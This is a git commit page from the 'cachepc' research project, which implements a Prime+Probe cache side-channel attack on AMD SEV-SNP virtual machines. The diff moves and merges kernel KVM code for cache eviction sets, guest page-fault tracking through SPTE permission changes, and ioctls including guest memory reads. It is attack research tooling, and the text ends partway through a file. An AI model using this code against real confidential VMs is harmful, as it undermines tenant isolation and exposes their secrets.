cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit d505f8bebab8214981a7b4ad63e2595fa497074c
parent 0e89d3b1b7c45ff9a3916b01ab56f177d4b64f8c
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  6 Oct 2022 09:53:35 +0200

Merge sevstep with cachepc dir and merge cachepc headers

Diffstat:
MMakefile | 9+++------
Dcachepc/cache_types.h | 66------------------------------------------------------------------
Mcachepc/cachepc.c | 40++++++++++++++++++++++------------------
Mcachepc/cachepc.h | 87+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++------
Dcachepc/device_conf.h | 29-----------------------------
Mcachepc/kvm.c | 4++--
Acachepc/mmu.c | 135+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Acachepc/sevstep.c | 263+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rsevstep/sevstep.h -> cachepc/sevstep.h | 0
Mcachepc/uapi.h | 91+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Acachepc/uspt.c | 488+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rsevstep/uspt.h -> cachepc/uspt.h | 0
Mpatch.diff | 85+++++++++++++++++++++++++++++++++++++++++--------------------------------------
Dsevstep/mmu.c | 135-------------------------------------------------------------------------------
Dsevstep/sevstep.c | 263-------------------------------------------------------------------------------
Dsevstep/uapi.h | 95-------------------------------------------------------------------------------
Dsevstep/uspt.c | 489-------------------------------------------------------------------------------
Mtest/sevstep.c | 2+-
18 files changed, 1130 insertions(+), 1151 deletions(-)

diff --git a/Makefile b/Makefile @@ -6,13 +6,10 @@ all: build test/eviction test/access test/kvm test/sev test/sev-es test/sevstep clean: $(MAKE) -C $(LINUX) SUBDIRS=arch/x86/kvm clean -$(LINUX)/arch/x86/kvm/svm/cachepc: +$(LINUX)/arch/x86/kvm/cachepc: ln -sf $(PWD)/cachepc $@ -$(LINUX)/arch/x86/kvm/sevstep: - ln -sf $(PWD)/sevstep $@ - -build: $(LINUX)/arch/x86/kvm/svm/cachepc $(LINUX)/arch/x86/kvm/sevstep +build: $(LINUX)/arch/x86/kvm/cachepc $(MAKE) -C $(LINUX) -j6 M=arch/x86/kvm load: @@ -21,7 +18,7 @@ load: sudo insmod $(LINUX)/arch/x86/kvm/kvm.ko sudo insmod $(LINUX)/arch/x86/kvm/kvm-amd.ko -test/%: test/%.c cachepc/uapi.h sevstep/uapi.h +test/%: test/%.c cachepc/uapi.h clang -o $@ $< -fsanitize=address -I . -Wunused-variable diff --git a/cachepc/cache_types.h b/cachepc/cache_types.h @@ -1,66 +0,0 @@ -#pragma once - -#include "device_conf.h" - -#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1)) - -#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK)) - -#define GET_BIT(b, i) (((b) >> (i)) & 1) -#define SET_BIT(b, i) ((b) | (1 << (i))) - -/* Operate cacheline flags - * Used flags: - * 32 2 1 0 - * | | ... | cache group initialized | last | first | - */ -#define DEFAULT_FLAGS 0 -#define SET_FIRST(flags) SET_BIT(flags, 0) -#define SET_LAST(flags) SET_BIT(flags, 1) -#define SET_CACHE_GROUP_INIT(flags) SET_BIT(flags, 2) -#define IS_FIRST(flags) GET_BIT(flags, 0) -#define IS_LAST(flags) GET_BIT(flags, 1) -#define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2) - -#define CL_NEXT_OFFSET offsetof(struct cacheline, next) -#define CL_PREV_OFFSET offsetof(struct cacheline, prev) - -typedef enum cache_level cache_level; -typedef enum addressing_type addressing_type; -typedef struct cacheline cacheline; -typedef struct cache_ctx cache_ctx; - -enum cache_level {L1, L2}; -enum addressing_type {VIRTUAL, PHYSICAL}; - -struct cache_ctx { - cache_level cache_level; - addressing_type addressing; - - uint32_t sets; - uint32_t associativity; - uint32_t access_time; - uint32_t nr_of_cachelines; - uint32_t set_size; - uint32_t cache_size; -}; - -struct cacheline { - // Doubly linked list inside same set - // Attention: CL_NEXT_OFFSET and CL_PREV_OFFSET - // must be kept up to date - cacheline *next; - cacheline *prev; - - uint32_t cache_set; - uint32_t cache_line; - uint32_t flags; - - // Unused padding to fill cache line - uint64_t count; - - char padding[24]; -}; - -static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size"); -static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8); diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c @@ -6,6 +6,10 @@ #include <linux/delay.h> #include <linux/ioctl.h> +#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1)) + +#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK)) + static void cl_insert(cacheline *last_cl, cacheline *new_cl); static void *remove_cache_set(cache_ctx *ctx, void *ptr); static void *remove_cache_group_set(void *ptr); @@ -47,20 +51,20 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, } cache_ctx * -cachepc_get_ctx(cache_level cache_level) +cachepc_get_ctx(int cache_level) { cache_ctx *ctx; ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL); BUG_ON(ctx == NULL); - BUG_ON(cache_level != L1); - if (cache_level == L1) { + BUG_ON(cache_level != L1_CACHE); + if (cache_level == L1_CACHE) { ctx->addressing = L1_ADDRESSING; ctx->sets = L1_SETS; ctx->associativity = L1_ASSOCIATIVITY; ctx->access_time = L1_ACCESS_TIME; - } else if (cache_level == L2) { + } else if (cache_level == L2_CACHE) { ctx->addressing = L2_ADDRESSING; ctx->sets = L2_SETS; ctx->associativity = L2_ASSOCIATIVITY; @@ -120,7 +124,7 @@ cachepc_prepare_victim(cache_ctx *ctx, uint32_t set) victim_cl = victim_set; // Free the other lines in the same set that are not used. - if (ctx->addressing == PHYSICAL) { + if (ctx->addressing == PHYSICAL_ADDRESSING) { curr_cl = victim_cl->next; do { next_cl = curr_cl->next; @@ -162,7 +166,7 @@ cachepc_save_msrmts(cacheline *head) curr_cl = head; do { - if (IS_FIRST(curr_cl->flags)) { + if (CL_IS_FIRST(curr_cl->flags)) { BUG_ON(curr_cl->cache_set >= cachepc_msrmts_count); cachepc_msrmts[curr_cl->cache_set] = curr_cl->count; } @@ -178,7 +182,7 @@ cachepc_print_msrmts(cacheline *head) curr_cl = head; do { - if (IS_FIRST(curr_cl->flags)) { + if (CL_IS_FIRST(curr_cl->flags)) { printk(KERN_WARNING "CachePC: Count for cache set %i: %llu\n", curr_cl->cache_set, curr_cl->count); } @@ -238,14 +242,14 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) do { next_cl = curr_cl->next; - if (IS_FIRST(curr_cl->flags)) { + if (CL_IS_FIRST(curr_cl->flags)) { first_cl_in_sets[curr_cl->cache_set] = curr_cl; } - if (IS_LAST(curr_cl->flags)) { + if (CL_IS_LAST(curr_cl->flags)) { last_cl_in_sets[curr_cl->cache_set] = curr_cl; } - if (ctx->addressing == PHYSICAL && !is_in_arr( + if (ctx->addressing == PHYSICAL_ADDRESSING && !is_in_arr( curr_cl->cache_set / CACHE_GROUP_SIZE, cache_groups, cache_groups_len)) { // Already free all unused blocks of the cache ds for physical @@ -255,7 +259,7 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) } curr_cl = next_cl; - } while(curr_cl != cache_ds); + } while (curr_cl != cache_ds); // Fix partial cache set ds for (i = 0; i < sets_len; ++i) { @@ -265,7 +269,7 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) cache_set_ds = first_cl_in_sets[sets[0]]; // Free unused cache lines - if (ctx->addressing == PHYSICAL) { + if (ctx->addressing == PHYSICAL_ADDRESSING) { cachepc_release_ds(ctx, to_del_cls); } @@ -359,9 +363,9 @@ cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) { for (j = 0; j < ctx->nr_of_cachelines; ++j) { curr_cl = cl_ptr_arr_sorted[j]; - if (IS_FIRST(curr_cl->flags)) + if (CL_IS_FIRST(curr_cl->flags)) first_cl_in_sets[curr_cl->cache_set] = curr_cl; - if (IS_LAST(curr_cl->flags)) + if (CL_IS_LAST(curr_cl->flags)) last_cl_in_sets[curr_cl->cache_set] = curr_cl; } @@ -402,10 +406,10 @@ void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_p curr_cl->prev = cacheline_ptr_arr[idx_map[(len - 1 + i) % len]]; if (idx_map[i] == 0) { - curr_cl->flags = SET_FIRST(DEFAULT_FLAGS); - curr_cl->prev->flags = SET_LAST(DEFAULT_FLAGS); + curr_cl->flags = CL_SET_FIRST(CL_DEFAULT_FLAGS); + curr_cl->prev->flags = CL_SET_LAST(CL_DEFAULT_FLAGS); } else { - curr_cl->flags |= DEFAULT_FLAGS; + curr_cl->flags |= CL_DEFAULT_FLAGS; } } @@ -425,7 +429,7 @@ allocate_cache_ds(cache_ctx *ctx) cl_ptr_arr = kzalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL); BUG_ON(cl_ptr_arr == NULL); - BUG_ON(ctx->addressing != VIRTUAL); + BUG_ON(ctx->addressing != VIRTUAL_ADDRESSING); // For virtual addressing, allocating a consecutive chunk of memory is enough cl_arr = cachepc_aligned_alloc(PAGE_SIZE, ctx->cache_size); diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -1,19 +1,94 @@ #pragma once #include "asm.h" -#include "cache_types.h" #include "uapi.h" -#define PMC_KERNEL 2 -#define PMC_USER 1 +#define CACHELINE_SIZE 64 +#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE) -#define PMC_HOST 2 -#define PMC_GUEST 1 +#define L1_CACHE 0 +#define L2_CACHE 1 + +#define VIRTUAL_ADDRESSING 0 +#define PHYSICAL_ADDRESSING 1 + +#define L1_ADDRESSING VIRTUAL_ADDRESSING +#define L1_SETS 64 +#define L1_ASSOCIATIVITY 8 +#define L1_ACCESS_TIME 4 + +#define L2_ADDRESSING PHYSICAL_ADDRESSING +#define L2_SETS 512 +#define L2_ASSOCIATIVITY 8 +#define L2_ACCESS_TIME 12 + +#define L3_ADDRESSING PHYSICAL_ADDRESSING +#define L3_SETS 4096 +#define L3_ASSOCIATIVITY 16 +#define L3_ACCESS_TIME 30 + +#define CACHEPC_GET_BIT(b, i) (((b) >> (i)) & 1) +#define CACHEPC_SET_BIT(b, i) ((b) | (1 << (i))) + +/* Operate cacheline flags + * Used flags: + * 32 2 1 0 + * | | ... | cache group initialized | last | first | + */ +#define CL_DEFAULT_FLAGS 0 +#define CL_SET_FIRST(flags) CACHEPC_SET_BIT(flags, 0) +#define CL_SET_LAST(flags) CACHEPC_SET_BIT(flags, 1) +#define CL_SET_GROUP_INIT(flags) CACHEPC_SET_BIT(flags, 2) +#define CL_IS_FIRST(flags) CACHEPC_GET_BIT(flags, 0) +#define CL_IS_LAST(flags) CACHEPC_GET_BIT(flags, 1) +#define CL_IS_GROUP_INIT(flags) CACHEPC_GET_BIT(flags, 2) + +#define CL_NEXT_OFFSET offsetof(struct cacheline, next) +#define CL_PREV_OFFSET offsetof(struct cacheline, prev) + +#define PMC_KERNEL (1 << 1) +#define PMC_USER (1 << 0) + +#define PMC_HOST (1 << 1) +#define PMC_GUEST (1 << 0) + +typedef struct cacheline cacheline; +typedef struct cache_ctx cache_ctx; + +struct cache_ctx { + int cache_level; + int addressing; + + uint32_t sets; + uint32_t associativity; + uint32_t access_time; + uint32_t nr_of_cachelines; + uint32_t set_size; + uint32_t cache_size; +}; + +struct cacheline { + /* Doubly linked cache lines inside same cache set */ + cacheline *next; + cacheline *prev; + + uint32_t cache_set; + uint32_t cache_line; + uint32_t flags; + + uint64_t count; + + /* padding to fill cache line */ + char padding[24]; +}; + +static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size"); +static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8); void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, int host_guest, int kernel_user); -cache_ctx *cachepc_get_ctx(cache_level cl); +cache_ctx *cachepc_get_ctx(int cache_level); void cachepc_release_ctx(cache_ctx *ctx); cacheline *cachepc_prepare_ds(cache_ctx *ctx); diff --git a/cachepc/device_conf.h b/cachepc/device_conf.h @@ -1,29 +0,0 @@ -#pragma once - -// TODO: Read from kernel headers - -// General settings -// #define PAGE_SIZE 4096 -#define PROCESSOR_FREQ 2900000000 - -// Cache related settings -#define CACHELINE_SIZE 64 -#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE) - -// Addressing: -// - virtual: 0 -// - physical: 1 -#define L1_ADDRESSING 0 -#define L1_SETS 64 -#define L1_ASSOCIATIVITY 8 -#define L1_ACCESS_TIME 4 - -#define L2_ADDRESSING 1 -#define L2_SETS 512 -#define L2_ASSOCIATIVITY 8 -#define L2_ACCESS_TIME 12 - -#define L3_ADDRESSING 1 -#define L3_SETS 4096 -#define L3_ASSOCIATIVITY 16 -#define L3_ACCESS_TIME 30 diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -225,7 +225,7 @@ cachepc_kvm_single_eviction_test(void *p) evicted = NULL; cl = head = cachepc_ds; do { - if (IS_FIRST(cl->flags) && cl->count > 0) { + if (CL_IS_FIRST(cl->flags) && cl->count > 0) { evicted = cl; count += cl->count; } @@ -350,7 +350,7 @@ cachepc_kvm_setup_test(void *p) printk(KERN_WARNING "CachePC: Running on core %i\n", cpu); - cachepc_ctx = cachepc_get_ctx(L1); + cachepc_ctx = cachepc_get_ctx(L1_CACHE); cachepc_ds = cachepc_prepare_ds(cachepc_ctx); cachepc_kvm_system_setup(); diff --git a/cachepc/mmu.c b/cachepc/mmu.c @@ -0,0 +1,135 @@ +#include "../cachepc/sevstep.h" +#include "../cachepc/uspt.h" + +static void +sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, + struct kvm_page_fault *fault) +{ + const int modes[] = { + KVM_PAGE_TRACK_WRITE, + KVM_PAGE_TRACK_ACCESS, + KVM_PAGE_TRACK_EXEC + }; + uint64_t current_rip; + bool was_tracked; + int have_rip, i; + int send_err; + + was_tracked = false; + for (i = 0; i < sizeof(modes) / sizeof(modes[0]); i++) { + if (kvm_slot_page_track_is_active(vcpu->kvm, + fault->slot, fault->gfn, modes[i])) { + sevstep_untrack_single_page(vcpu, fault->gfn, modes[i]); + was_tracked = true; + } + } + + if (was_tracked) { + have_rip = false; + if (sevstep_uspt_should_get_rip()) + have_rip = sevstep_get_rip_kvm_vcpu(vcpu, &current_rip) == 0; + if (sevstep_uspt_batch_tracking_in_progress()) { + send_err = sevstep_uspt_batch_tracking_save(fault->gfn << PAGE_SHIFT, + fault->error_code, have_rip, current_rip); + if (send_err) { + printk_ratelimited( + "sevstep_uspt_batch_tracking_save failed with %d\n" + "##########################\n", send_err); + } + sevstep_uspt_batch_tracking_handle_retrack(vcpu, fault->gfn); + sevstep_uspt_batch_tracking_inc_event_idx(); + } else { + send_err = sevstep_uspt_send_and_block(fault->gfn << PAGE_SHIFT, + fault->error_code, have_rip, current_rip); + if (send_err) { + printk("sevstep_uspt_send_and_block failed with %d\n" + "##########################\n", send_err); + } + } + } +} + +bool +sevstep_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) +{ + u64 spte; + bool flush; + + spte = *sptep; + if (!is_writable_pte(spte) && !(pt_protect && is_mmu_writable_spte(spte))) + return false; + + rmap_printk("spte %p %llx\n", sptep, *sptep); + + if (pt_protect) + spte &= ~EPT_SPTE_MMU_WRITABLE; + + flush = false; + if (mode == KVM_PAGE_TRACK_WRITE) { + spte = spte & ~PT_WRITABLE_MASK; + flush = true; + } else if (mode == KVM_PAGE_TRACK_RESET_ACCESSED) { + spte = spte & ~PT_ACCESSED_MASK; + } else if (mode == KVM_PAGE_TRACK_ACCESS) { + spte = spte & ~PT_PRESENT_MASK; + spte = spte & ~PT_WRITABLE_MASK; + spte = spte & ~PT_USER_MASK; + spte = spte | (0x1ULL << PT64_NX_SHIFT); + flush = true; + } else if (mode == KVM_PAGE_TRACK_EXEC) { + spte = spte | (0x1ULL << PT64_NX_SHIFT); + flush = true; + } else if (mode == KVM_PAGE_TRACK_RESET_EXEC) { + spte = spte & ~(0x1ULL << PT64_NX_SHIFT); + flush = true; + } else { + printk(KERN_WARNING "spte_protect was called with invalid mode" + "parameter %d\n",mode); + } + flush |= mmu_spte_update(sptep, spte); + + return flush; +} +EXPORT_SYMBOL(sevstep_spte_protect); + +bool sevstep_rmap_protect(struct kvm_rmap_head *rmap_head, + bool pt_protect, enum kvm_page_track_mode mode) +{ + u64 *sptep; + struct rmap_iterator iter; + bool flush = false; + + for_each_rmap_spte(rmap_head, &iter, sptep) { + flush |= sevstep_spte_protect(sptep, pt_protect, mode); + } + + return flush; +} +EXPORT_SYMBOL(sevstep_rmap_protect); + +bool +sevstep_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, + uint64_t gfn, int min_level, enum kvm_page_track_mode mode) +{ + struct kvm_rmap_head *rmap_head; + bool protected; + int i; + + protected = false; + + if (kvm_memslots_have_rmaps(kvm)) { + for (i = min_level; i <= KVM_MAX_HUGEPAGE_LEVEL; ++i) { + rmap_head = gfn_to_rmap(gfn, i, slot); + protected |= sevstep_rmap_protect(rmap_head, true, mode); + } + } + + if (is_tdp_mmu_enabled(kvm)) { + protected |= kvm_tdp_mmu_write_protect_gfn(kvm, + slot, gfn, min_level); + } + + return protected; +} +EXPORT_SYMBOL(sevstep_kvm_mmu_slot_gfn_protect); + diff --git a/cachepc/sevstep.c b/cachepc/sevstep.c @@ -0,0 +1,263 @@ +#include "sevstep.h" +#include "cachepc.h" + +#include "mmu/mmu_internal.h" +#include "mmu.h" + +#include "irq.h" +#include "ioapic.h" +#include "mmu.h" +#include "mmu/tdp_mmu.h" +#include "x86.h" +#include "kvm_cache_regs.h" +#include "kvm_emulate.h" +#include "cpuid.h" +#include "mmu/spte.h" + +#include <linux/kvm_host.h> +#include <linux/types.h> +#include <linux/string.h> +#include <linux/mm.h> +#include <linux/highmem.h> +#include <linux/moduleparam.h> +#include <linux/export.h> +#include <linux/swap.h> +#include <linux/hugetlb.h> +#include <linux/compiler.h> +#include <linux/srcu.h> +#include <linux/slab.h> +#include <linux/sched/signal.h> +#include <linux/uaccess.h> +#include <linux/hash.h> +#include <linux/kern_levels.h> +#include <linux/kthread.h> +#include <linux/sev.h> +#include <linux/mm.h> +#include <linux/smp.h> +#include <linux/vmalloc.h> +#include <linux/slab.h> +#include <linux/sched.h> + +#include "kvm_cache_regs.h" +#include "svm/svm.h" + +struct kvm* main_vm; +EXPORT_SYMBOL(main_vm); + +bool +sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + if (mode == KVM_PAGE_TRACK_ACCESS) { + pr_warn("Adding gfn: %016llx to access page track pool\n", gfn); + } + + if (mode == KVM_PAGE_TRACK_WRITE) { + pr_warn("Adding gfn: %016llx to write page track pool\n", gfn); + } + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } else { + pr_warn("Failed to track %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } + if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page is already tracked"); + } + printk(KERN_CONT "\n"); + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_track_single_page); + +bool +sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + if (mode == KVM_PAGE_TRACK_ACCESS) { + pr_warn("Removing gfn: %016llx from acess page track pool\n", gfn); + } + if (mode == KVM_PAGE_TRACK_WRITE) { + pr_warn("Removing gfn: %016llx from write page track pool\n", gfn); + } + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } else { + pr_warn("Failed to untrack %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page track was not active"); + } + printk(KERN_CONT "\n"); + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_untrack_single_page); + +bool +sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL) { + write_lock(&vcpu->kvm->mmu_lock); + // Vincent: The kvm mmu function now requires min_level + // We want all pages to protected so we do PG_LEVEL_4K + // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, + PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_ACCESSED); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_reset_accessed_on_page); + +bool +sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL) { + write_lock(&vcpu->kvm->mmu_lock); + // Vincent: The kvm mmu function now requires min_level + // We want all pages to protected so we do PG_LEVEL_4K + // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, + PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + + srcu_read_unlock(&vcpu->kvm->srcu, idx); + + return ret; +} +EXPORT_SYMBOL(sevstep_clear_nx_on_page); + +long +sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + struct kvm_memory_slot *slot; + struct kvm_memory_slot *first_memslot; + struct rb_node *node; + u64 iterator, iterat_max; + long count = 0; + int idx; + + // Vincent: Memslots interface changed into a rb tree, see + // here: https:// lwn.net/Articles/856392/ + // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + // Thus we use instead of + // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator = 0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; +} +EXPORT_SYMBOL(sevstep_start_tracking); + +long +sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + struct kvm_memory_slot *slot; + struct kvm_memory_slot *first_memslot; + struct rb_node *node; + u64 iterator, iterat_max; + long count = 0; + int idx; + + // Vincent: Memslots interface changed into a rb tree, see + // here: https:// lwn.net/Articles/856392/ + // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + // Thus we use instead of + // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator=0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + // Vincent: I think see here + // https:// patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ + if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; +} +EXPORT_SYMBOL(sevstep_stop_tracking); + +int +sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip) +{ + return 0; +} diff --git a/sevstep/sevstep.h b/cachepc/sevstep.h diff --git a/cachepc/uapi.h b/cachepc/uapi.h @@ -7,3 +7,94 @@ #define CACHEPC_IOCTL_TEST_ACCESS _IOWR(CACHEPC_IOCTL_MAGIC, 0, __u32) #define CACHEPC_IOCTL_TEST_EVICTION _IOWR(CACHEPC_IOCTL_MAGIC, 1, __u32) #define CACHEPC_IOCTL_INIT_PMC _IOW(CACHEPC_IOCTL_MAGIC, 2, __u32) + +#define KVM_TRACK_PAGE _IOWR(KVMIO, 0x20, track_page_param_t) +#define KVM_USPT_REGISTER_PID _IOWR(KVMIO, 0x21, userspace_ctx_t) +#define KVM_USPT_WAIT_AND_SEND _IO(KVMIO, 0x22) +#define KVM_USPT_POLL_EVENT _IOWR(KVMIO, 0x23, page_fault_event_t) +#define KVM_USPT_ACK_EVENT _IOWR(KVMIO, 0x24, ack_event_t) +#define KVM_READ_GUEST_MEMORY _IOWR(KVMIO, 0x25, read_guest_memory_t) +#define KVM_USPT_RESET _IO(KVMIO, 0x26) +#define KVM_USPT_TRACK_ALL _IOWR(KVMIO, 0x27, track_all_pages_t) +#define KVM_USPT_UNTRACK_ALL _IOWR(KVMIO, 0x28, track_all_pages_t) +#define KVM_USPT_SETUP_RETINSTR_PERF _IOWR(KVMIO, 0x30, retired_instr_perf_config_t) +#define KVM_USPT_READ_RETINSTR_PERF _IOWR(KVMIO, 0x31, retired_instr_perf_t) +#define KVM_USPT_BATCH_TRACK_START _IOWR(KVMIO, 0x32, batch_track_config_t) +#define KVM_USPT_BATCH_TRACK_STOP _IOWR(KVMIO, 0x33, batch_track_stop_and_get_t) +#define KVM_USPT_BATCH_TRACK_EVENT_COUNT _IOWR(KVMIO, 0x34, batch_track_event_count_t) + +#define KVM_USPT_POLL_EVENT_NO_EVENT 1000 +#define KVM_USPT_POLL_EVENT_GOT_EVENT 0 + +enum kvm_page_track_mode { + KVM_PAGE_TRACK_WRITE, + KVM_PAGE_TRACK_ACCESS, + KVM_PAGE_TRACK_RESET_ACCESSED, + KVM_PAGE_TRACK_EXEC, + KVM_PAGE_TRACK_RESET_EXEC, + KVM_PAGE_TRACK_MAX, +}; + +typedef struct { + __u64 id; // filled automatically + __u64 faulted_gpa; + __u32 error_code; + __u8 have_rip_info; + __u64 rip; + __u64 ns_timestamp; + __u8 have_retired_instructions; + __u64 retired_instructions; +} page_fault_event_t; + +typedef struct { + __s32 tracking_type; + __u64 expected_events; + __s32 perf_cpu; + __u8 retrack; +} batch_track_config_t; + +typedef struct { + __u64 event_count; +} batch_track_event_count_t; + +typedef struct { + page_fault_event_t* out_buf; + __u64 len; + __u8 error_during_batch; +} batch_track_stop_and_get_t; + +typedef struct { + __s32 cpu; // cpu on which we want to read the counter + __u64 retired_instruction_count; // result param +} retired_instr_perf_t; + +typedef struct { + __s32 cpu; // cpu on which counter should be programmed +} retired_instr_perf_config_t; + +typedef struct { + __u64 gpa; + __u64 len; + __u8 decrypt_with_host_key; + __s32 wbinvd_cpu; // -1: do not flush; else logical cpu on which we flush + void *output_buffer; +} read_guest_memory_t; + +typedef struct { + __s32 pid; + __u8 get_rip; +} userspace_ctx_t; + +typedef struct { + __u64 id; +} ack_event_t; + +typedef struct { + __u64 gpa; + __s32 track_mode; +} track_page_param_t; + +typedef struct { + __s32 track_mode; +} track_all_pages_t; + diff --git a/cachepc/uspt.c b/cachepc/uspt.c @@ -0,0 +1,488 @@ +#include "uspt.h" +#include "sevstep.h" +#include "cachepc.h" + +#include <linux/kvm.h> +#include 